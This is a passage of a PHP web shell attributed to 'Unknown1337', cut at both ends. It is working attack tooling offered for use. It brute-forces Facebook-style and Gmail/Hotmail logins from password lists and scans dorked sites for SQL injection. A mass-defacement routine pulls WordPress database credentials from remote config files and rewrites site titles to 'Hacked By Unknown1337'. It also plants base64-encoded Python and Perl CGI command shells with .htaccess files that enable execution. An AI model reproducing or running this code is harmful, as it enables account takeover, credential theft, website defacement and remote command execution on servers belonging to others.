CURLOPT_RETURNTRANSFER, 1); curl_setopt($ch, CURLOPT_FOLLOWLOCATION, TRUE); curl_setopt($ch, CURLOPT_POSTFIELDS, "email={$user}&pass={$pass}"); curl_setopt($ch, CURLOPT_USERAGENT, "Chrome/36.0.1985.125"); $login = curl_exec($ch); //print_r($login); $check = (eregi('class="s t i u"',$login)) ? true:false; if($check == true){ echo "<p align='center' dir='ltr'><font face='Arial Black' size='2'>Not the right one :( || Username : <font color='red'>$user</font> Password : <font color='red'>$pass</font></font></p>"; }else{ echo "<p align='center' dir='ltr'><font face='Arial Black' size='2'>This Password Seems Working !Try It ^_^ by Unknown1337|| Username: <font color='green'>$user</font> Password : <font color='green'>$pass</font></font></p>"; } } $username = explode("\n", $_POST['username']); $password = explode("\n", $_POST['password']); foreach($username as $users) { $users = @trim($users); foreach($password as $pass) { $pass = @trim($pass); echo brute($users,$pass); } } } echo"<br> <br> <br> <br> <center><p><b><font size='2' face='Trebuchet MS' color='#FFFFFF'>Published by : Unknown1337<br><font size='2' face='Trebuchet MS' color='#FFFFFF'>Coded by : Unknown1337</font></b></p></center>"; } elseif($_GET['do'] == 'emailbrute'){ @ini_set('output_buffering',0); ?> <form action="?y=<?php echo $pwd; ?>&x=syahrul" method="post"> <br><br><center><b><font size=4>+--=[ Gmail BruteForce by Unknown1337 ]=--+</font></b></center><br> <center><span style="font-size:30px; font-family:Fredericka the Great; color:#1975FF">Gmail & Hotmail BruteForce Unknown1337</span><center><br> <?php set_time_limit(0); error_reporting(0); class s1{ private $adres = array( 'gmail' => '{imap.gmail.com:993/imap/ssl}', 'hotmail' => '{pop3.live.com:995/pop3/ssl}' ); private $imap; function __construct($gelen1,$gelen2){ $uname = explode("\r\n",$gelen1); $pwd = explode("\r\n",$gelen2); foreach($pwd as $pass){ $pass = trim($pass); foreach($uname as $user){ $user = trim($user); if(preg_match('@gmail@si',$user)){ $this->baglan($this->adres["gmail"],$user,$pass); }else{ $this->baglan($this->adres["hotmail"],$user,$pass); } } } } public function baglan($url,$user,$pass){ $this->imap = imap_open($url,$user,$pass); if($this->imap){ echo "<span id='cikti' >$user => $pass </span><br />"; } } function __destruct(){ imap_close($this->imap); } } echo " <head> <link rel='icon' type='image/ico' href='http://www.hondupalmahn.com/imagenes/gmail.png'/> <form method='POST'> <title>Gmail Brute Force 2018</title> </head> <style> textarea { resize:none; color: #1975FF ; border:1px solid #1975FF ; border-left: 4px solid #1975FF ; } input { color: #1975FF; border:1px dotted #33CCFF; } </style>"; echo '<br /> <center><div id="form"> <form id="form" method="POST" > <textarea cols="42" class="area" name="mail" rows="14" cols="28">Email Target Lu Disini Cok ^_^</textarea> <textarea cols="42" class="area" name="sifre" rows="14" cols="28">Password List Lu Disini Cok ^_^</textarea> <br /> <br /> <input type="submit" id="submit" value="Brute !" /> </form><br> </div> <div id="sonuc"> '; if($_POST){ $mails = $_POST["mail"]; $sifre = $_POST["sifre"]; if((isset($mails)) and (isset($sifre))){ $s1 = new s1($mails,$sifre); } } echo '</center></div> '; } elseif($_GET['do'] == 'sqli-scanner') { ?> <form action="?dir=<?php echo $pwd; ?>&=sqli-scanner" method="post"> <?php echo '<br><br><center><form method="post" action=""><b><font color="white">Dork : </font></b> <input class="inputz" type="text" value="" name="dork" style="color:white;background-color:#000000" size="20"/> <input class="inputzbut" type="submit" style="color:white;background-color:#000000" name="scan" value="Scan"></form></center>'; ob_start(); set_time_limit(0); if (isset($_POST['scan'])) { $browser = $_SERVER['HTTP_USER_AGENT']; $first = "startgoogle.startpagina.nl/index.php?q="; $sec = "&start="; $reg = '/<p class="g"><a href="(.*)" target="_self" onclick="/'; for($id=0 ; $id<=30; $id++){ $page=$id*10; $dork=urlencode($_POST['dork']); $url = $first.$dork.$sec.$page; $curl = curl_init($url); curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1); curl_setopt($curl,CURLOPT_USERAGENT,'$browser)'); $result = curl_exec($curl); curl_close($curl); preg_match_all($reg,$result,$matches); } foreach($matches[1] as $site){ $url = preg_replace("/=/", "='", $site); $curl=curl_init(); curl_setopt($curl,CURLOPT_RETURNTRANSFER,1); curl_setopt($curl,CURLOPT_URL,$url); curl_setopt($curl,CURLOPT_USERAGENT,'$browser)'); curl_setopt($curl,CURLOPT_TIMEOUT,'5'); $GET=curl_exec($curl); if (preg_match("/error in your SQL syntax|mysql_fetch_array()|execute query|mysql_fetch_object()|mysql_num_rows()|mysql_fetch_assoc()|mysql_fetch​_row()|SELECT * FROM|supplied argument is not a valid MySQL|Syntax error|Fatal error/i",$GET)) { echo '<center><b><font color="#E10000">Found : </font><a href="'.$url.'" target="_blank">'.$url.'</a><font color=#FF0000> <-- SQLI Vuln Found..</font></b></center>'; ob_flush();flush(); }else{ echo '<center><font color="#FFFFFF"><b>'.$url.'</b></font><font color="#0FFF16"> <-- Not Vuln</font></center>'; ob_flush();flush(); } ob_flush();flush(); } ob_flush();flush(); } ob_flush();flush(); } elseif($_GET['do'] == 'phpinfo'){ @ob_start(); @eval("phpinfo();"); $buff = @ob_get_contents(); @ob_end_clean(); $awal = strpos($buff,"<body>")+6; $akhir = strpos($buff,"</body>"); echo "<div class=\"phpinfo\">".substr($buff,$awal,$akhir-$awal)."</div>"; } elseif($_GET['do'] == 'title'){ echo "<center><h1>Mass Title Changer</h1> <form method='post'> Link Config: <br> <input type='text' name='linkconf' height='10' style='width: 450px;' placeholder='http://xnxx.com/ia_symconf/'><br> <input type='submit' style='width: 450px;' name='gass' value='Hajar!!' class='oke'> </form></center>"; if($_POST['gass']) { echo "<center> <form method='post'> Link Config: <br> <textarea name='link'>"; GrabUrl($_POST['linkconf'],'wordpress'); echo"</textarea><br>ID: <input type='text' name='id' value='1'><br>TITLE :<input type='text' name='title' value='Hacked By Unknown1337'><br>POST CONTENT: <input type='text' name='content' value='Hacked By Unknown1337'><br>POSTNAME: <input type='text' name='postname' value='HackeD By Unknown1337'><br> <input type='submit' style='width: 450px;' name='edittitle' value='Gassbre!!'> </form></center>"; } if($_POST['edittitle']) { $title = htmlspecialchars($_POST['title']); $id = $_POST['id']; $content = $_POST['content']; $postname = $_POST['name']; function anucurl($sites) { $ch = curl_init($sites); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1); curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0"); curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 5); curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0); curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0); curl_setopt($ch, CURLOPT_COOKIEJAR,'cookie.txt'); curl_setopt($ch, CURLOPT_COOKIEFILE,'cookie.txt'); curl_setopt($ch, CURLOPT_COOKIESESSION,true); $data = curl_exec($ch); curl_close($ch); return $data; } $link = explode("\r\n", $_POST['link']); foreach($link as $dir_config) { $config = anucurl($dir_config); $dbhost = ambilkata($config,"DB_HOST', '","'"); $dbuser = ambilkata($config,"DB_USER', '","'"); $dbpass = ambilkata($config,"DB_PASSWORD', '","'"); $dbname = ambilkata($config,"DB_NAME', '","'"); $dbprefix = ambilkata($config,"table_prefix = '","'"); $prefix = $dbprefix."posts"; $option = $dbprefix."options"; $conn = mysql_connect($dbhost,$dbuser,$dbpass); $db = mysql_select_db($dbname); $q = mysql_query("SELECT * FROM $prefix ORDER BY ID ASC"); $result = mysql_fetch_array($q); $id = $result[ID]; $q2 = mysql_query("SELECT * FROM $option ORDER BY option_id ASC"); $result2 = mysql_fetch_array($q2); $target = $result2[option_value]; $update = mysql_query("UPDATE $prefix SET post_title='$title',post_content='$content',post_name='$postname',post_status='publish',comment_status='open',ping_status='open',post_type='post',comment_count='1' WHERE id='$id'"); $update .= mysql_query("UPDATE $option SET option_value='$title' WHERE option_name='blogname' OR option_name='blogdescription'"); echo "<div style='margin: 5px auto;'>"; if($target == '') { echo "URL: <font color=red>error, gabisa ambil nama domain nya</font> -> "; } else { echo "URL: <a href='$target/?p=$id' target='_blank'>$target/?p=$id</a> -> "; } if(!$update OR !$conn OR !$db) { echo "<font color=red>MySQL Error: ".mysql_error()."</font><br>"; } else { echo "<font color=lime>sukses di ganti.</font><br>"; } echo "</div>"; mysql_close($conn); } } } elseif($_GET['do'] == 'cgipy') { $cgi_dir = mkdir('ia_cgi', 0755); chdir('ia_cgi'); $file_cgi = "cgipy.Unknown1337"; $memeg = ".htaccess"; $isi_htcgi = "OPTIONS Indexes Includes ExecCGI FollowSymLinks \n AddType application/x-httpd-cgi .Index_Unknown1337 \n AddHandler cgi-script .Index_Unknown1337 \n AddHandler cgi-script .Index_Unknown1337"; $htcgi = fopen(".htaccess", "w"); $cgi_script = "IyEvdXNyL2Jpbi9weXRob24NCiMgMDctMDctMDQNCiMgdjEuMC4wDQoNCiMgY2dpLXNoZWxsLnB5DQojIEEgc2ltcGxlIENHSSB0aGF0IGV4ZWN1dGVzIGFyYml0cmFyeSBzaGVsbCBjb21tYW5kcy4NCg0KDQojIENvcHlyaWdodCBNaWNoYWVsIEZvb3JkDQojIFlvdSBhcmUgZnJlZSB0byBtb2RpZnksIHVzZSBhbmQgcmVsaWNlbnNlIHRoaXMgY29kZS4NCg0KIyBObyB3YXJyYW50eSBleHByZXNzIG9yIGltcGxpZWQgZm9yIHRoZSBhY2N1cmFjeSwgZml0bmVzcyB0byBwdXJwb3NlIG9yIG90aGVyd2lzZSBmb3IgdGhpcyBjb2RlLi4uLg0KIyBVc2UgYXQgeW91ciBvd24gcmlzayAhISENCg0KIyBFLW1haWwgbWljaGFlbCBBVCBmb29yZCBET1QgbWUgRE9UIHVrDQojIE1haW50YWluZWQgYXQgd3d3LnZvaWRzcGFjZS5vcmcudWsvYXRsYW50aWJvdHMvcHl0aG9udXRpbHMuaHRtbA0KDQoiIiINCkEgc2ltcGxlIENHSSBzY3JpcHQgdG8gZXhlY3V0ZSBzaGVsbCBjb21tYW5kcyB2aWEgQ0dJLg0KIiIiDQojIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjDQojIEltcG9ydHMNCnRyeToNCiAgICBpbXBvcnQgY2dpdGI7IGNnaXRiLmVuYWJsZSgpDQpleGNlcHQ6DQogICAgcGFzcw0KaW1wb3J0IHN5cywgY2dpLCBvcw0Kc3lzLnN0ZGVyciA9IHN5cy5zdGRvdXQNCmZyb20gdGltZSBpbXBvcnQgc3RyZnRpbWUNCmltcG9ydCB0cmFjZWJhY2sNCmZyb20gU3RyaW5nSU8gaW1wb3J0IFN0cmluZ0lPDQpmcm9tIHRyYWNlYmFjayBpbXBvcnQgcHJpbnRfZXhjDQoNCiMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMNCiMgY29uc3RhbnRzDQoNCmZvbnRsaW5lID0gJzxGT05UIENPTE9SPSM0MjQyNDIgc3R5bGU9ImZvbnQtZmFtaWx5OnRpbWVzO2ZvbnQtc2l6ZToxMnB0OyI+Jw0KdmVyc2lvbnN0cmluZyA9ICdWZXJzaW9uIDEuMC4wIDd0aCBKdWx5IDIwMDQnDQoNCmlmIG9zLmVudmlyb24uaGFzX2tleSgiU0NSSVBUX05BTUUiKToNCiAgICBzY3JpcHRuYW1lID0gb3MuZW52aXJvblsiU0NSSVBUX05BTUUiXQ0KZWxzZToNCiAgICBzY3JpcHRuYW1lID0gIiINCg0KTUVUSE9EID0gJyJQT1NUIicNCg0KIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIw0KIyBQcml2YXRlIGZ1bmN0aW9ucyBhbmQgdmFyaWFibGVzDQoNCmRlZiBnZXRmb3JtKHZhbHVlbGlzdCwgdGhlZm9ybSwgbm90cHJlc2VudD0nJyk6DQogICAgIiIiVGhpcyBmdW5jdGlvbiwgZ2l2ZW4gYSBDR0kgZm9ybSwgZXh0cmFjdHMgdGhlIGRhdGEgZnJvbSBpdCwgYmFzZWQgb24NCiAgICB2YWx1ZWxpc3QgcGFzc2VkIGluLiBBbnkgbm9uLXByZXNlbnQgdmFsdWVzIGFyZSBzZXQgdG8gJycgLSBhbHRob3VnaCB0aGlzIGNhbiBiZSBjaGFuZ2VkLg0KICAgIChlLmcuIHRvIHJldHVybiBOb25lIHNvIHlvdSBjYW4gdGVzdCBmb3IgbWlzc2luZyBrZXl3b3JkcyAtIHdoZXJlICcnIGlzIGEgdmFsaWQgYW5zd2VyIGJ1dCB0byBoYXZlIHRoZSBmaWVsZCBtaXNzaW5nIGlzbid0LikiIiINCiAgICBkYXRhID0ge30NCiAgICBmb3IgZmllbGQgaW4gdmFsdWVsaXN0Og0KICAgICAgICBpZiBub3QgdGhlZm9ybS5oYXNfa2V5KGZpZWxkKToNCiAgICAgICAgICAgIGRhdGFbZmllbGRdID0gbm90cHJlc2VudA0KICAgICAgICBlbHNlOg0KICAgICAgICAgICAgaWYgIHR5cGUodGhlZm9ybVtmaWVsZF0pICE9IHR5cGUoW10pOg0KICAgICAgICAgICAgICAgIGRhdGFbZmllbGRdID0gdGhlZm9ybVtmaWVsZF0udmFsdWUNCiAgICAgICAgICAgIGVsc2U6DQogICAgICAgICAgICAgICAgdmFsdWVzID0gbWFwKGxhbWJkYSB4OiB4LnZhbHVlLCB0aGVmb3JtW2ZpZWxkXSkgICAgICMgYWxsb3dzIGZvciBsaXN0IHR5cGUgdmFsdWVzDQogICAgICAgICAgICAgICAgZGF0YVtmaWVsZF0gPSB2YWx1ZXMNCiAgICByZXR1cm4gZGF0YQ0KDQoNCnRoZWZvcm1oZWFkID0gIiIiPEhUTUw+PEhFQUQ+PFRJVExFPmNnaS1zaGVsbC5weSAtIGEgQ0dJIGJ5IEZ1enp5bWFuPC9USVRMRT48L0hFQUQ+DQo8Qk9EWT48Q0VOVEVSPg0KPEgxPldlbGNvbWUgdG8gY2dpLXNoZWxsLnB5IC0gPEJSPmEgUHl0aG9uIENHSTwvSDE+DQo8Qj48ST5CeSBGdXp6eW1hbjwvQj48L0k+PEJSPg0KIiIiK2ZvbnRsaW5lICsiVmVyc2lvbiA6ICIgKyB2ZXJzaW9uc3RyaW5nICsgIiIiLCBSdW5uaW5nIG9uIDogIiIiICsgc3RyZnRpbWUoJyVJOiVNICVwLCAlQSAlZCAlQiwgJVknKSsnLjwvQ0VOVEVSPjxCUj4nDQoNCnRoZWZvcm0gPSAiIiI8SDI+RW50ZXIgQ29tbWFuZDwvSDI+DQo8Rk9STSBNRVRIT0Q9XCIiIiIgKyBNRVRIT0QgKyAnIiBhY3Rpb249IicgKyBzY3JpcHRuYW1lICsgIiIiXCI+DQo8aW5wdXQgbmFtZT1jbWQgdHlwZT10ZXh0PjxCUj4NCjxpbnB1dCB0eXBlPXN1Ym1pdCB2YWx1ZT0iU3VibWl0Ij48QlI+DQo8L0ZPUk0+PEJSPjxCUj4iIiINCmJvZHllbmQgPSAnPC9CT0RZPjwvSFRNTD4nDQplcnJvcm1lc3MgPSAnPENFTlRFUj48SDI+U29tZXRoaW5nIFdlbnQgV3Jvbmc8L0gyPjxCUj48UFJFPicNCg0KIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIw0KIyBtYWluIGJvZHkgb2YgdGhlIHNjcmlwdA0KDQppZiBfX25hbWVfXyA9PSAnX19tYWluX18nOg0KICAgIHByaW50ICJDb250ZW50LXR5cGU6IHRleHQvaHRtbCIgICAgICAgICAjIHRoaXMgaXMgdGhlIGhlYWRlciB0byB0aGUgc2VydmVyDQogICAgcHJpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICMgc28gaXMgdGhpcyBibGFuayBsaW5lDQogICAgZm9ybSA9IGNnaS5GaWVsZFN0b3JhZ2UoKQ0KICAgIGRhdGEgPSBnZXRmb3JtKFsnY21kJ10sZm9ybSkNCiAgICB0aGVjbWQgPSBkYXRhWydjbWQnXQ0KICAgIHByaW50IHRoZWZvcm1oZWFkDQogICAgcHJpbnQgdGhlZm9ybQ0KICAgIGlmIHRoZWNtZDoNCiAgICAgICAgcHJpbnQgJzxIUj48QlI+PEJSPicNCiAgICAgICAgcHJpbnQgJzxCPkNvbW1hbmQgOiAnLCB0aGVjbWQsICc8QlI+PEJSPicNCiAgICAgICAgcHJpbnQgJ1Jlc3VsdCA6IDxCUj48QlI+Jw0KICAgICAgICB0cnk6DQogICAgICAgICAgICBjaGlsZF9zdGRpbiwgY2hpbGRfc3Rkb3V0ID0gb3MucG9wZW4yKHRoZWNtZCkNCiAgICAgICAgICAgIGNoaWxkX3N0ZGluLmNsb3NlKCkNCiAgICAgICAgICAgIHJlc3VsdCA9IGNoaWxkX3N0ZG91dC5yZWFkKCkNCiAgICAgICAgICAgIGNoaWxkX3N0ZG91dC5jbG9zZSgpDQogICAgICAgICAgICBwcmludCByZXN1bHQucmVwbGFjZSgnXG4nLCAnPEJSPicpDQoNCiAgICAgICAgZXhjZXB0IEV4Y2VwdGlvbiwgZTogICAgICAgICAgICAgICAgICAgICAgIyBhbiBlcnJvciBpbiBleGVjdXRpbmcgdGhlIGNvbW1hbmQNCiAgICAgICAgICAgIHByaW50IGVycm9ybWVzcw0KICAgICAgICAgICAgZiA9IFN0cmluZ0lPKCkNCiAgICAgICAgICAgIHByaW50X2V4YyhmaWxlPWYpDQogICAgICAgICAgICBhID0gZi5nZXR2YWx1ZSgpLnNwbGl0bGluZXMoKQ0KICAgICAgICAgICAgZm9yIGxpbmUgaW4gYToNCiAgICAgICAgICAgICAgICBwcmludCBsaW5lDQoNCiAgICBwcmludCBib2R5ZW5kDQoNCg0KIiIiDQpUT0RPL0lTU1VFUw0KDQoNCg0KQ0hBTkdFTE9HDQoNCjA3LTA3LTA0ICAgICAgICBWZXJzaW9uIDEuMC4wDQpBIHZlcnkgYmFzaWMgc3lzdGVtIGZvciBleGVjdXRpbmcgc2hlbGwgY29tbWFuZHMuDQpJIG1heSBleHBhbmQgaXQgaW50byBhIHByb3BlciAnZW52aXJvbm1lbnQnIHdpdGggc2Vzc2lvbiBwZXJzaXN0ZW5jZS4uLg0KIiIi"; $cgi = fopen($file_cgi, "w"); fwrite($cgi, base64_decode($cgi_script)); fwrite($htcgi, $isi_htcgi); chmod($file_cgi, 0755); chmod($memeg, 0755); echo "<br><center>Done ... <a href='ia_cgi/cgipy.Unknown1337' target='_blank'>Klik Here</a>"; } elseif($_GET['do'] == 'cgi') { $cgi_dir = mkdir('ia_cgi', 0755); chdir('ia_cgi'); $file_cgi = "cgi.Unknown1337"; $memeg = ".htaccess"; $isi_htcgi = "OPTIONS Indexes Includes ExecCGI FollowSymLinks \n AddType application/x-httpd-cgi .Unknown1337 \n AddHandler cgi-script .Unknown1337 \n AddHandler cgi-script .Unknown1337"; $htcgi = fopen(".htaccess", "w"); $cgi_script = "IyEvdXNyL2Jpbi9wZXJsIC1JL3Vzci9sb2NhbC9iYW5kbWluDQp1c2UgTUlNRTo6QmFzZTY0Ow0KJFZlcnNpb249ICJDR0ktVGVsbmV0IFZlcnNpb24gMS4zIjsNCiRFZGl0UGVyc2lvbj0iPGZvbnQgc3R5bGU9J3RleHQtc2hhZG93OiAwcHggMHB4IDZweCByZ2IoMjU1LCAwLCAwKSwgMHB4IDBweCA1cHggcmdiKDMwMCwgMCwgMCksIDBweCAwcHggNXB4IHJnYigzMDAsIDAsIDApOyBjb2xvcjojZmZmZmZmOyBmb250LXdlaWdodDpib2xkOyc+YjM3NGsgLSBDR0ktVGVsbmV0PC9mb250PiI7DQoNCiRQYXNzd29yZCA9ICJ4YWlzeW5kaWNhdGUiOwkJCSMgQ2hhbmdlIHRoaXMuIFlvdSB3aWxsIG5lZWQgdG8gZW50ZXIgdGhpcyB0byBsb2dpbi4NCnN1YiBJc19XaW4oKXsNCgkkb3MgPSAmdHJpbSgkRU5WeyJTRVJWRVJfU09GVFdBUkUifSk7DQoJaWYoJG9zID1+IG0vd2luL2kpew0KCQlyZXR1cm4gMTsNCgl9DQoJZWxzZXsNCgkJcmV0dXJuIDA7DQoJfQ0KfQ0KJFdpbk5UID0gJklzX1dpbigpOwkJCQkjIFlvdSBuZWVkIHRvIGNoYW5nZSB0aGUgdmFsdWUgb2YgdGhpcyB0byAxIGlmDQoJCQkJCQkJCSMgeW91J3JlIHJ1bm5pbmcgdGhpcyBzY3JpcHQgb24gYSBXaW5kb3dzIE5UDQoJCQkJCQkJCSMgbWFjaGluZS4gSWYgeW91J3JlIHJ1bm5pbmcgaXQgb24gVW5peCwgeW91DQoJCQkJCQkJCSMgY2FuIGxlYXZlIHRoZSB2YWx1ZSBhcyBpdCBpcy4NCg0KJE5UQ21kU2VwID0gIiYiOwkJCQkjIFRoaXMgY2hhcmFjdGVyIGlzIHVzZWQgdG8gc2VwZXJhdGUgMiBjb21tYW5kcw0KCQkJCQkJCQkjIGluIGEgY29tbWFuZCBsaW5lIG9uIFdpbmRvd3MgTlQuDQoNCiRVbml4Q21kU2VwID0gIjsiOwkJCQkjIFRoaXMgY2hhcmFjdGVyIGlzIHVzZWQgdG8gc2VwZXJhdGUgMiBjb21tYW5kcw0KCQkJCQkJCQkjIGluIGEgY29tbWFuZCBsaW5lIG9uIFVuaXguDQoNCiRDb21tYW5kVGltZW91dER1cmF0aW9uID0gMTAwMDA7CSMgVGltZSBpbiBzZWNvbmRzIGFmdGVyIGNvbW1hbmRzIHdpbGwgYmUga2lsbGVkDQoJCQkJCQkJCSMgRG9uJ3Qgc2V0IHRoaXMgdG8gYSB2ZXJ5IGxhcmdlIHZhbHVlLiBUaGlzIGlzDQoJCQkJCQkJCSMgdXNlZnVsIGZvciBjb21tYW5kcyB0aGF0IG1heSBoYW5nIG9yIHRoYXQNCgkJCQkJCQkJIyB0YWtlIHZlcnkgbG9uZyB0byBleGVjdXRlLCBsaWtlICJmaW5kIC8iLg0KCQkJCQkJCQkjIFRoaXMgaXMgdmFsaWQgb25seSBvbiBVbml4IHNlcnZlcnMuIEl0IGlzDQoJCQkJCQkJCSMgaWdub3JlZCBvbiBOVCBTZXJ2ZXJzLg0KDQokU2hvd0R5bmFtaWNPdXRwdXQgPSAxOwkJCSMgSWYgdGhpcyBpcyAxLCB0aGVuIGRhdGEgaXMgc2VudCB0byB0aGUNCgkJCQkJCQkJIyBicm93c2VyIGFzIHNvb24gYXMgaXQgaXMgb3V0cHV0LCBvdGhlcndpc2UNCgkJCQkJCQkJIyBpdCBpcyBidWZmZXJlZCBhbmQgc2VuZCB3aGVuIHRoZSBjb21tYW5kDQoJCQkJCQkJCSMgY29tcGxldGVzLiBUaGlzIGlzIHVzZWZ1bCBmb3IgY29tbWFuZHMgbGlrZQ0KCQkJCQkJCQkjIHBpbmcsIHNvIHRoYXQgeW91IGNhbiBzZWUgdGhlIG91dHB1dCBhcyBpdA0KCQkJCQkJCQkjIGlzIGJlaW5nIGdlbmVyYXRlZC4NCg0KIyBET04nVCBDSEFOR0UgQU5ZVEhJTkcgQkVMT1cgVEhJUyBMSU5FIFVOTEVTUyBZT1UgS05PVyBXSEFUIFlPVSdSRSBET0lORyAhIQ0KDQokQ21kU2VwID0gKCRXaW5OVCA/ICROVENtZFNlcCA6ICRVbml4Q21kU2VwKTsNCiRDbWRQd2QgPSAoJFdpbk5UID8gImNkIiA6ICJwd2QiKTsNCiRQYXRoU2VwID0gKCRXaW5OVCA/ICJcXCIgOiAiLyIpOw0KJFJlZGlyZWN0b3IgPSAoJFdpbk5UID8gIiAyPiYxIDE+JjIiIDogIiAxPiYxIDI+JjEiKTsNCiRjb2xzPSAxNTA7DQokcm93cz0gMjY7DQojLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tDQojIFJlYWRzIHRoZSBpbnB1dCBzZW50IGJ5IHRoZSBicm93c2VyIGFuZCBwYXJzZXMgdGhlIGlucHV0IHZhcmlhYmxlcy4gSXQNCiMgcGFyc2VzIEdFVCwgUE9TVCBhbmQgbXVsdGlwYXJ0L2Zvcm0tZGF0YSB0aGF0IGlzIHVzZWQgZm9yIHVwbG9hZGluZyBmaWxlcy4NCiMgVGhlIGZpbGVuYW1lIGlzIHN0b3JlZCBpbiAkaW57J2YnfSBhbmQgdGhlIGRhdGEgaXMgc3RvcmVkIGluICRpbnsnZmlsZWRhdGEnfS4NCiMgT3RoZXIgdmFyaWFibGVzIGNhbiBiZSBhY2Nlc3NlZCB1c2luZyAkaW57J3Zhcid9LCB3aGVyZSB2YXIgaXMgdGhlIG5hbWUgb2YNCiMgdGhlIHZhcmlhYmxlLiBOb3RlOiBNb3N0IG9mIHRoZSBjb2RlIGluIHRoaXMgZnVuY3Rpb24gaXMgdGFrZW4gZnJvbSBvdGhlciBDR0kNCiMgc2NyaXB0cy4NCiMtLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0NCnN1YiBSZWFkUGFyc2UgDQp7DQoJbG9jYWwgKCppbikgPSBAXyBpZiBAXzsNCglsb2NhbCAoJGksICRsb2MsICRrZXksICR2YWwpOw0KCQ0KCSRNdWx0aXBhcnRGb3JtRGF0YSA9ICRFTlZ7J0NPTlRFTlRfVFlQRSd9ID1+IC9tdWx0aXBhcnRcL2Zvcm0tZGF0YTsgYm91bmRhcnk9KC4rKSQvOw0KDQoJaWYoJEVOVnsnUkVRVUVTVF9NRVRIT0QnfSBlcSAiR0VUIikNCgl7DQoJCSRpbiA9ICRFTlZ7J1FVRVJZX1NUUklORyd9Ow0KCX0NCgllbHNpZigkRU5WeydSRVFVRVNUX01FVEhPRCd9IGVxICJQT1NUIikNCgl7DQoJCWJpbm1vZGUoU1RESU4pIGlmICRNdWx0aXBhcnRGb3JtRGF0YSAmICRXaW5OVDsNCgkJcmVhZChTVERJTiwgJGluLCAkRU5WeydDT05URU5UX0xFTkdUSCd9KTsNCgl9DQoNCgkjIGhhbmRsZSBmaWxlIHVwbG9hZCBkYXRhDQoJaWYoJEVOVnsnQ09OVEVOVF9UWVBFJ30gPX4gL211bHRpcGFydFwvZm9ybS1kYXRhOyBib3VuZGFyeT0oLispJC8pDQoJew0KCQkkQm91bmRhcnkgPSAnLS0nLiQxOyAjIHBsZWFzZSByZWZlciB0byBSRkMxODY3IA0KCQlAbGlzdCA9IHNwbGl0KC8kQm91bmRhcnkvLCAkaW4pOyANCgkJJEhlYWRlckJvZHkgPSAkbGlzdFsxXTsNCgkJJEhlYWRlckJvZHkgPX4gL1xyXG5cclxufFxuXG4vOw0KCQkkSGVhZGVyID0gJGA7DQoJCSRCb2R5ID0gJCc7DQogCQkkQm9keSA9fiBzL1xyXG4kLy87ICMgdGhlIGxhc3QgXHJcbiB3YXMgcHV0IGluIGJ5IE5ldHNjYXBlDQoJCSRpbnsnZmlsZWRhdGEnfSA9ICRCb2R5Ow0KCQkkSGVhZGVyID1+IC9maWxlbmFtZT1cIiguKylcIi87IA0KCQkkaW57J2YnfSA9ICQxOyANCgkJJGlueydmJ30gPX4gcy9cIi8vZzsNCgkJJGlueydmJ30gPX4gcy9ccy8vZzsNCg0KCQkjIHBhcnNlIHRyYWlsZXINCgkJZm9yKCRpPTI7ICRsaXN0WyRpXTsgJGkrKykNCgkJeyANCgkJCSRsaXN0WyRpXSA9fiBzL14uK25hbWU9JC8vOw0KCQkJJGxpc3RbJGldID1+IC9cIihcdyspXCIvOw0KCQkJJGtleSA9ICQxOw0KCQkJJHZhbCA9ICQnOw0KCQkJJHZhbCA9fiBzLyheKFxyXG5cclxufFxuXG4pKXwoXHJcbiR8XG4kKS8vZzsNCgkJCSR2YWwgPX4gcy8lKC4uKS9wYWNrKCJjIiwgaGV4KCQxKSkvZ2U7DQoJCQkkaW57JGtleX0gPSAkdmFsOyANCgkJfQ0KCX0NCgllbHNlICMgc3RhbmRhcmQgcG9zdCBkYXRhICh1cmwgZW5jb2RlZCwgbm90IG11bHRpcGFydCkNCgl7DQoJCUBpbiA9IHNwbGl0KC8mLywgJGluKTsNCgkJZm9yZWFjaCAkaSAoMCAuLiAkI2luKQ0KCQl7DQoJCQkkaW5bJGldID1+IHMvXCsvIC9nOw0KCQkJKCRrZXksICR2YWwpID0gc3BsaXQoLz0vLCAkaW5bJGldLCAyKTsNCgkJCSRrZXkgPX4gcy8lKC4uKS9wYWNrKCJjIiwgaGV4KCQxKSkvZ2U7DQoJCQkkdmFsID1+IHMvJSguLikvcGFjaygiYyIsIGhleCgkMSkpL2dlOw0KCQkJJGlueyRrZXl9IC49ICJcMCIgaWYgKGRlZmluZWQoJGlueyRrZXl9KSk7DQoJCQkkaW57JGtleX0gLj0gJHZhbDsNCgkJfQ0KCX0NCn0NCg0KIy0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ0KIyBQcmludHMgdGhlIEhUTUwgUGFnZSBIZWFkZXINCiMgQXJndW1lbnQgMTogRm9ybSBpdGVtIG5hbWUgdG8gd2hpY2ggZm9jdXMgc2hvdWxkIGJlIHNldA0KIy0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0t